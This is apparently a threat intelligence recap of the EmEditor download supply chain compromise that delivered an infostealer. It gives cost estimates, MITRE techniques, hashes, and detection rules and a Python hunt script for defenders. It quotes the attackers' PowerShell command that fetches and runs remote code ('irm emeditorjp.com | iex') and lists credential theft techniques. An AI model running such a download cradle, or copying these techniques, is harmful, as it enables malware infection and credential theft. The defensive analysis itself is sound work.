EmEditor Software Supply Chain Attack Recap
BLUF
The download button on the EmEditor website was compromised to redirect users to a fake installer that deployed infostealer malware.
Executive Cost Summary
This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.
For organizations affected by a compromised legitimate software download delivering infostealer malware:
Low-end total cost: $550,000 – $800,000
(Limited user exposure, rapid containment, no downstream credential abuse)
Typical expected range: $900,000 – $1.6M
(Multiple users affected, enterprise-wide credential resets, extended monitoring)
Upper-bound realistic scenarios: $2M – $3.5M
(Credential reuse detected, regulatory involvement, prolonged assurance efforts)
Key cost drivers:
Scope of credential theft rather than system destruction
Number of affected users with privileged or sensitive access
Duration of uncertainty around downstream misuse of stolen data
Regulatory and audit expectations tied to software supply-chain integrity
Targeted Sectors
· Software users
· E-commerce
· Finance
· Healthcare
Countries
· U.S. supply chains targeted
Date of First Reported Activity
· December 25, 2025
Date of Last Reported Activity Update
· January 5, 2026
APT Names
· There have not been any APT groups named in open source reporting at this time.
Associated Criminal Organization Names
· There have not been any criminal organizations named in open source reporting at this time.
IOCs
· Malicious redirect URLs from the EmEditor website.
· Hash of the fake installer.
· C2 domains for the infostealer.
Tools Used in Campaign
· Infostealer malware
· Rogue browser extensions for remote control/crypto swapping.
CVEs and CVSS Vectors
· This activity has not been associated with any exploits at this time
Nessus ID
· There have not been any CVEs reported at this time
Mitigation Data
· Users were advised to verify the integrity of their downloaded software and to use prevention-first, AI-driven security defenses.
Malware Names
· Infostealer
· MixShell malware (speculated to be related to similar campaigns)
Malware Samples
As a reminder, hunts should be built on the heuristic behavior of the malware. Hashes, domains, etc. tend to be dynamic: they are usually different for each target and attack, and can differ even within the same attack.
MixShell
Sha256
e69d8b96b106816cb732190bc6f8c2693aecb6056b8f245e2c15841fcb48ff94
83b27e52c420b6132f8034e7a0fd9943b1f4af3bdb06cdbb873c80360e1e5419
URL link to example
· hxxps://www.virustotal.com/gui/file/e69d8b96b106816cb732190bc6f8c2693aecb6056b8f245e2c15841fcb48ff94
· hxxps://www.virustotal.com/gui/file/83b27e52c420b6132f8034e7a0fd9943b1f4af3bdb06cdbb873c80360e1e5419/community
TTPs
Initial Access
· T1195.002 Compromise Software Supply Chain
o The attackers modified the official EmEditor download infrastructure to serve a malicious version of the software to legitimate users.
· T1189 Drive-by Compromise
o Users were compromised by simply clicking a trusted download button on a legitimate website that had been subverted by threat actors.
Execution
· T1204.002 User Execution Malicious File
o The attack relied on users manually downloading and running the trojanized .msi installer.
· T1059.001 Command and Scripting Interpreter PowerShell
o Upon execution, the malicious installer launched a PowerShell script (powershell.exe "irm emeditorjp.com | iex", where irm is the alias of Invoke-RestMethod and iex of Invoke-Expression) to fetch additional malware payloads from a remote server.
Persistence
· T1176 Browser Extensions
o The malware maintained a persistent presence by installing a rogue browser extension named "Google Drive Caching" (ID ngahobakhbdpmokneiohlfofdmgpakd).
Defense Evasion
· T1553.002 Subvert Trust Controls Code Signing
o The malicious installer was digitally signed with a valid certificate from "WALSHAM INVESTMENTS LIMITED" to bypass security warnings and mimic legitimate software.
· T1036 Masquerading
o The installer used the exact same filename and a similar file size as the genuine EmEditor installer to evade visual detection by users.
Credential Access & Collection
· T1555 Credentials from Password Stores
o The malware harvested credentials from web browsers and various applications, including VPN configurations (Zoho Mail, Evernote, Discord, etc.).
· T1056.001 Input Capture Keylogging
o The persistent browser extension was used to record user keystrokes.
· T1113 Screen Capture
o The malware had the capability to take screenshots of the victim's system.
· T1115 Clipboard Modification
o The malware monitored the clipboard to hijack cryptocurrency transactions.
Exfiltration
· T1041 Exfiltration Over C2 Channel
o Stolen data, including cookies, bookmarks, and system information, was sent back to the attackers' command-and-control infrastructure.
Suggested Rules / potential hunts
As a reminder, these are indicator rules and are likely to be noisy.
For best results, consider creating a data model and reviewing the traffic as a report.
The domain fake-emeditor-domain.com in the rules below is a placeholder; substitute the staging domain observed in this campaign (emeditorjp.com) or any other domain you have confirmed before deploying.
Suricata
Malicious Installer Signature Alert
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"MALWARE-OTHER EmEditor Malicious Installer Download (WALSHAM Signed)"; flow:established,to_client; file_data; content:"WALSHAM INVESTMENTS LIMITED"; classtype:trojan-activity; sid:2026001; rev:1;)
Command and Control (C2) Communication
alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN EmEditor Supply Chain Attack C2 TLS SNI"; tls.sni; content:"fake-emeditor-domain.com"; nocase; classtype:trojan-activity; sid:2026002; rev:1;)
Malicious Extension ID Detection
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"MALWARE-CNC Malicious Google Drive Caching Extension Communication"; http.uri; content:"ngahobakhbdpmokneiohlfofdmgpakd"; classtype:trojan-activity; sid:2026003; rev:1;)
SentinelOne
Hunt for Malicious Digital Signature
Indicator = "Digital Signature" AND CertificatePublisher = "WALSHAM INVESTMENTS LIMITED" AND ProcessName = "emeditor_setup.msi"
Identify Malicious PowerShell Downloads
ObjectType = "Process" AND ProcessName = "powershell.exe" AND (CommandLine Contains "Invoke-WebRequest" OR CommandLine Contains "Invoke-RestMethod" OR CommandLine Contains "iwr " OR CommandLine Contains "irm ") AND CommandLine Contains "fake-emeditor-domain.com"
Persistence via Malicious Extension
ObjectType = "File" AND FilePath Contains "ngahobakhbdpmokneiohlfofdmgpakd" AND FilePath Contains "Extensions"
Splunk
Insecure Installer Downloads
index=network sourcetype=stream:http (uri_path="*emeditor_setup.msi" OR uri_path="*emed64_*.msi") | stats count by src_ip, dest_ip, uri_path, http_user_agent
Execution of the Malicious Script
index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 (CommandLine="*powershell*" AND CommandLine="*emeditor*") | table _time, host, user, CommandLine
Credential Theft Indicators
index=windows EventCode=4663 (ProcessName="*powershell.exe" OR ProcessName="*emeditor*") (ObjectName="*VPN*" OR ObjectName="*Zoho*" OR ObjectName="*Slack*" OR ObjectName="*Discord*") | stats count by host, ObjectName, ProcessName
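An added example, not part of this recap or of any vendor's rule set: a small Python hunt that applies three of the indicators above to Sysmon-style events. It matches the PowerShell aliases (irm/iwr piped into iex), which is what lets it catch the observed "irm emeditorjp.com | iex" command, flags the rogue extension ID under a browser Extensions directory, and flags the WALSHAM signer on an image load. The event records and the file names inside them are constructed.

```python
import re

# Indicators quoted in the recap above (page values, not constructed).
ROGUE_EXTENSION_ID = "ngahobakhbdpmokneiohlfofdmgpakd"
SUSPICIOUS_SIGNER = "WALSHAM INVESTMENTS LIMITED"

# Download cradle: a web-fetch cmdlet or its alias piped into Invoke-Expression.
# Covering the aliases is what makes "irm emeditorjp.com | iex" visible to the hunt.
CRADLE_RE = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b[^|]*\|\s*(iex|invoke-expression)\b",
    re.IGNORECASE,
)

def classify(event):
    """Return the rule names that one Sysmon-style event (a dict of fields) triggers."""
    hits = []
    image = event.get("Image", "").lower()
    if image.endswith("powershell.exe") and CRADLE_RE.search(event.get("CommandLine", "")):
        hits.append("powershell_download_cradle")      # T1059.001, Sysmon Event ID 1
    target = event.get("TargetFilename", "").replace("/", "\\").lower()
    if ROGUE_EXTENSION_ID in target and "\\extensions\\" in target:
        hits.append("rogue_extension_install")          # T1176, Sysmon Event ID 11
    if event.get("Signature", "").upper() == SUSPICIOUS_SIGNER:
        hits.append("suspicious_signer")                # T1553.002, Sysmon Event ID 7
    return hits

def hunt(events):
    """Run every rule over a list of events; returns [(event_index, rule_name), ...]."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]

# Constructed sample telemetry modelled on the behaviour the recap describes.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe "irm emeditorjp.com | iex"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},          # benign
    {"EventID": 11, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default"
                       r"\Extensions\ngahobakhbdpmokneiohlfofdmgpakd\1.0_0\manifest.json"},
    {"EventID": 7, "Image": r"C:\Windows\System32\msiexec.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\constructed_payload.dll",         # constructed name
     "Signature": "WALSHAM INVESTMENTS LIMITED"},
]

if __name__ == "__main__":
    for index, rule in hunt(SAMPLE_EVENTS):
        print(f"event {index}: {rule}")
```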
Delivery Method
· Compromised legitimate website/software download link.
Email Samples
· Not applicable
References
Check Point Research
· hxxps://research.checkpoint.com/2026/5th-january-threat-intelligence-report/
EmEditor
· hxxps://www.emeditor.com/general/important-follow-up-security-incident-notice-regarding-the-emeditor-installer-download-link/
Purple Ops
· hxxps://www.purple-ops.io/cybersecurity-threat-intelligence-blog/emeditor-supply-chain-attack/
Security Week
· hxxps://www.securityweek.com/infostealer-malware-delivered-in-emeditor-supply-chain-attack/
SC Media
· hxxps://www.scworld.com/brief/emeditor-supply-chain-compromise-facilitates-infostealer-deployment
VirusTotal
· hxxps://www.virustotal.com/gui/file/e69d8b96b106816cb732190bc6f8c2693aecb6056b8f245e2c15841fcb48ff94
· hxxps://www.virustotal.com/gui/file/83b27e52c420b6132f8034e7a0fd9943b1f4af3bdb06cdbb873c80360e1e5419/community